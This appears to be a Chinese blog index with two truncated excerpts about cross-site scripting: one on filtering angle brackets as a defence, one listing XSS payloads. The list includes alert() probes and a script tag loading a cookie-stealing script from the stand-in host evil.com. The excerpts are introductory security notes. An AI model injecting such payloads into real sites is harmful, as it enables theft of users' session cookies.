摘要:
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“<script 阅读全文
摘要:
1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http: 阅读全文